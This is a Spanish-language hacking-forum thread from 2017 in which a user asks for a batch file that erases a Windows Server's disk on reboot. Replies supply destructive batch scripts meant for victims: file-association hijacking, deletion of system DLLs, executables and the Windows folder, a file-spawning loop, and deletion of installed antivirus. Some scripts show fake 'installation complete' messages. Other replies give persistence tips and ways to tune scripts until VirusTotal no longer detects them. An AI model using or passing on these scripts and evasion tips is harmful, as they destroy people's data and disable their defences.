[SOLUCIONADO] Se puede crear un batch que destruya un sistema operativo ?

  • 11 Respuestas
  • 4946 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado kob

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Buenas noches tengo una duda,deseo crear un batch que al reiniciar el equipo borre todo el disco duro y la data desde la plataforma windows server ,tendria que bajar el antivirus?
« Última modificación: Agosto 28, 2017, 03:24:41 am por Stiuvert »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5774
  • Actividad:
    100%
  • Country: ar
  • Reputación 42
  • ANTRAX
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email
Hola,

Al parecer nunca has programado nada en Batch... Al ser algo nativo de Windows, los antivirus no lo detectan.
No creo que puedas destruir todo el sistema operativo, pero lo que si puedes hacer, es cambiar la asociación de archivos colocando en tu código algo como esto:

Código: (dos) You are not allowed to view links. Register or Login
ASSOC .exe=txtfile
ASSOC .html=txtfile
ASSOC .doc=txtfile
ASSOC .docx=txtfile
.........

De esta forma, cuando abran algun .exe, archivo de word, etc se abrirá un TXT con código raro. Es decir, dejarán de andar todos los archivos de la PC.

Saludos,
ANTRAX


Desconectado Bael

  • *
  • Underc0der
  • Mensajes: 175
  • Actividad:
    0%
  • Reputación 5
  • Twitter: @Bael_x42
    • Ver Perfil
    • Email
La pregunta del asunto y la del mensaje son distintas xD. Si, se puede crear, como bien dices con con un formateo al reiniciar ya lo tienes. Y normalmente no hace falta tocar nada del antivirus. Quizá algún tipo de solución empresarial basado en comportamiento quizá salte alguna alarma, no lo tengo claro, la verdad.

Desconectado kob

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
ejemplo cuando windows hace comprobaciones de disco duro al reiniciar se podria poner que en vez de eso inicie el diskpart y se use el clean

Desconectado xyz

  • *
  • Ex-Staff
  • *****
  • Mensajes: 533
  • Actividad:
    0%
  • Reputación 13
    • Ver Perfil
    • Under0cde
Podes utilizar el registro, meterlo como servicio, fijarte de tener los privilegios adecuados o UAC desactivado.

 Varias maneras, métodos, todo depende de tu objetivo final.

Un saludo !

Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
You are not allowed to view links. Register or Login
La pregunta del asunto y la del mensaje son distintas xD. Si, se puede crear, como bien dices con con un formateo al reiniciar ya lo tienes. Y normalmente no hace falta tocar nada del antivirus. Quizá algún tipo de solución empresarial basado en comportamiento quizá salte alguna alarma, no lo tengo claro, la verdad.
Hoy en dia la mayoria de los AV's detentan script maliciosos en batch no tiene que ser ninguno empresarial

y si como comentan los demas podrias hacer simplemente que formatee o borre particion al reiniciarse, en si solo es cuestion de imaginacion para que las cosas funcionen, si no actualmente podrias correr algun script en powershell :p
El conocimiento es libre...
La información no lo es xD

Desconectado Bael

  • *
  • Underc0der
  • Mensajes: 175
  • Actividad:
    0%
  • Reputación 5
  • Twitter: @Bael_x42
    • Ver Perfil
    • Email
Te faltó lo importante del AV: basado en comportamiento. No soy un experto en antivirus, ya me gustaría, pero por lo que sé (algún vídeo de Fernando de la Cuadra y artículos sueltos) lo más común es que comparen con cosas conocidas, por lo que el ratio de detección es bastante bajo. Simplemente los encoders que trae Metasploit ya hace que sea bastante sencilla la evasión de AV, y ya no hablemos de herramientas externas xD. Por lo que he leído en algunos sitios están implementando AV basados en comportamiento, y los ratios de detección aumentas muchísimo, pero tienen el problema de que hay que entrenarlos.

Puede que esté equivocado en todo esto, como he dicho no soy un experto en AV. Para comprobar si son detectados, he creado dos .bat y los he subido a virustotal (cositas serias no las subáis aquí eh! xD el primero simplemente con un format c:\ y el ratio de detección a sido 13/58. Esto quiero decir que lo tienen en sus BBDD como virus, con el nombre que podéis ver en la captura. Aunque menos BitDefender el resto no eran muy conocidos, es un ratio alto para mi gusto. He creado un nuevo .bat, añadiendo únicamente dos lineas, un MKDIR, un CD y luego el FORMAT. ¿Detección? 1/58, con lo que me doy por satisfecho. Creo que con esta pequeña prueba se puede ver que los AV no "leen" el script, simplemente miran si se encuentra en su BBDD para comprobar si es un virus o no.


Desconectado Lautaro Villarreal Culic'

  • *
  • Underc0der
  • Mensajes: 220
  • Actividad:
    0%
  • Country: ar
  • Reputación 7
  • ...
  • Twitter: @lautarovculic
    • Ver Perfil
    • Lautaro Villarreal Culic'
    • Email
Es muy difícil que un AV te detecte un .bat como virus, quizás con un poco de ingenio al principio (como hizo Bael) puedas evitarlo. Aunque, si sabes el AV de la víctima, puedes ir analizando el .bat con virustotal hasta que no te lo reconozca y así enviarlo tranquilo.

Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
You are not allowed to view links. Register or Login
Te faltó lo importante del AV: basado en comportamiento. No soy un experto en antivirus, ya me gustaría, pero por lo que sé (algún vídeo de Fernando de la Cuadra y artículos sueltos) lo más común es que comparen con cosas conocidas, por lo que el ratio de detección es bastante bajo. Simplemente los encoders que trae Metasploit ya hace que sea bastante sencilla la evasión de AV, y ya no hablemos de herramientas externas xD. Por lo que he leído en algunos sitios están implementando AV basados en comportamiento, y los ratios de detección aumentas muchísimo, pero tienen el problema de que hay que entrenarlos.

Puede que esté equivocado en todo esto, como he dicho no soy un experto en AV. Para comprobar si son detectados, he creado dos .bat y los he subido a virustotal (cositas serias no las subáis aquí eh! xD el primero simplemente con un format c:\ y el ratio de detección a sido 13/58. Esto quiero decir que lo tienen en sus BBDD como virus, con el nombre que podéis ver en la captura. Aunque menos BitDefender el resto no eran muy conocidos, es un ratio alto para mi gusto. He creado un nuevo .bat, añadiendo únicamente dos lineas, un MKDIR, un CD y luego el FORMAT. ¿Detección? 1/58, con lo que me doy por satisfecho. Creo que con esta pequeña prueba se puede ver que los AV no "leen" el script, simplemente miran si se encuentra en su BBDD para comprobar si es un virus o no.


aqui hay otra cosa, como que antivirus total, esta mas basado en firmas, no hace un scaneo con heuristica, por que hoy en dia la gran mayoria de av's no estan basados solo en firmas, si no en sistemas de IDS, si haces llamadas a apis o importas ekis cantidad de apis te lo va a detectar, el 360 lo detecto por que el format c:\ esta en una blacklist de cadenas, o lo que es lo mismo firmas, pero si por ejemplo lo haces correr en un sistema con bitdefender o kasperky, te lo va a frenar al momento de llamarlo, por que entras en un coportamiento generico, eso es otra cosa, el ocupar cosas como metasploit para disfrazar un bicho solo te haria un salto por scan time y no por runtime :p, de echo la mejor manera de saltarte el AV que sea es comiendo muchos ciclos de reloj antes de ejecutar el payload, ya que los av's no solo van por firmas, tambien estan funcionando con emuladores y IDS, que se basan en el comportamiento de api hooks :p
El conocimiento es libre...
La información no lo es xD

Desconectado M03's

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
mira prueba con este:

Tomado de:
Código: You are not allowed to view links. Register or Login
https://www.taringa.net/posts/info/12763970/Archivos-que-pueden-danar-PC-s-Hecho-Por-Mi.html
y  virus total no lo detecta   ;)

Archivos que pueden dañar PC's
[/b]

Estos archivos utilizan MS-Dos (cmd.exe), que es un interprete de "Comandos"

¿Qué es un comando de Ms-Dos?
Es una orden que le damos al sistema operativo para que haga una tarea determinada.

Los archivos se guardan en .bat



Borra .dll y .exe

Código: You are not allowed to view links. Register or Login
echo off
cd
del *.dll /q
del *.exe /q
msg * Se a instalado Por Completo
msg * Cuando le des aceptar se va a reiniciar tu Pc
shutdown –r
exit

PD: Tener muchisimo cuidado, ya que se borraran todos tus archivos de windows (Dll) y los ejecutables (Exe)



Borra Windows

Código: You are not allowed to view links. Register or Login
echo off
erase C:WINDOWS q
msg * Se a terminado con la instalacion, dele aceptar y se reiniciara tu PC
shutdown –r
exit

PD: El titulo te lo dice todo, lo abris, quedas frito

Deja sin internet

Código: You are not allowed to view links. Register or Login
echo off
ipconfig/release
msg * Ops ha ocurrido un error con la conexion a internet
pause
exit
PD: Arruina tu coneccion de red, casi siempre arruina tu router/Modem

Gusanos
Código: You are not allowed to view links. Register or Login
echo off
cd/
title gusano
:menu:
echo jajaja>%RANDOM%.bat
goto:menu:

PD: Crea un archivo y de el se reproducen automaticamente, hasta que se te satura la Pc de informacion y de archivos



Borra Antivirus
Código: You are not allowed to view links. Register or Login
echo off
cls
cd
cd "Archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "NOD32 Antivirus System"
attrib -R -A -S -H *.*
del /S /Q *.*
cls


PD: Borra tu antivirus, si quieres agregar otro antivirus agregas lo siguiente antes de "Cls"

Código: You are not allowed to view links. Register or Login
cd "Ubicacion del antivirus dentro de Archivos de programa"
attrib -R -A -S -H *.*
del /S /Q *.*

Borra Counter
Código: You are not allowed to view links. Register or Login
echo off
cls
cd
cd "archivos de programa"
cd "Counter Strike 1.6"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Counter-Strike 1.6"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
Exit
« Última modificación: Agosto 25, 2017, 12:38:25 pm por xyz »

Desconectado Lautaro Villarreal Culic'

  • *
  • Underc0der
  • Mensajes: 220
  • Actividad:
    0%
  • Country: ar
  • Reputación 7
  • ...
  • Twitter: @lautarovculic
    • Ver Perfil
    • Lautaro Villarreal Culic'
    • Email
Borrar el Counter  ;D ;D ;D ;D ;D ;D

Desconectado Randomize

  • *
  • Underc0der
  • Mensajes: 386
  • Actividad:
    0%
  • Reputación -13
    • Ver Perfil
You are not allowed to view links. Register or Login
Borrar el Counter  ;D ;D ;D ;D ;D ;D


Estamos en el 2017...

En el 2005 "te hubiéramos echado del foro por pensarlo"  ;D ;D ;D